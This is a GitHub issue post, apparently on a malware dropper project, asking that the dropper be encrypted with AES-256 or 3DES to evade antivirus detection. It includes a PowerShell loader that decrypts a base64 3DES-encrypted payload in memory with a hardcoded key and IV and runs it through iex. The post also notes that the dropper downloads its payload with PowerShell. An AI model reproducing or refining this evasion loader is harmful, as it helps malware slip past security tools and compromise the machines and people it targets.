You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I don't know much about encryption , just making a suggestion that might reduce the AV detection rate of the dropper since powershell is used to download the payload.
The text was updated successfully, but these errors were encountered:
I would like you to make the dropper encrypted with aes-256 or 3des-192-cbc to evade AV's
It would be something like this
$key = [Convert]::FromBase64String("xKc6APq4mM0xAjMg6TETedOZKqugeZYB")
$iv = [Convert]::FromBase64String("pVglsY0BHNk=")
$Payload = "YxNjPvngQ3g=";
$TDES = New-Object "System.Security.Cryptography.TripleDESCryptoServiceProvider";
$TDES.Mode = [System.Security.Cryptography.CipherMode]::ECB;
$TDES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
$TDES.BlockSize = 64;
$TDES.KeySize = 192;
$DataByte = [Convert]::FromBase64String($Payload)
$MS = New-Object System.IO.MemoryStream(,$DataByte)
$CS = New-Object System.Security.Cryptography.CryptoStream($MS,$TDES.CreateDecryptor($Key,$IV), [System.Security.Cryptography.CryptoStreamMode]::Read)
$Reader = New-Object System.IO.StreamReader($CS)
$Result = $Reader.ReadToEnd()
$Reader.Dispose()
iex($Result)
I don't know much about encryption , just making a suggestion that might reduce the AV detection rate of the dropper since powershell is used to download the payload.
The text was updated successfully, but these errors were encountered: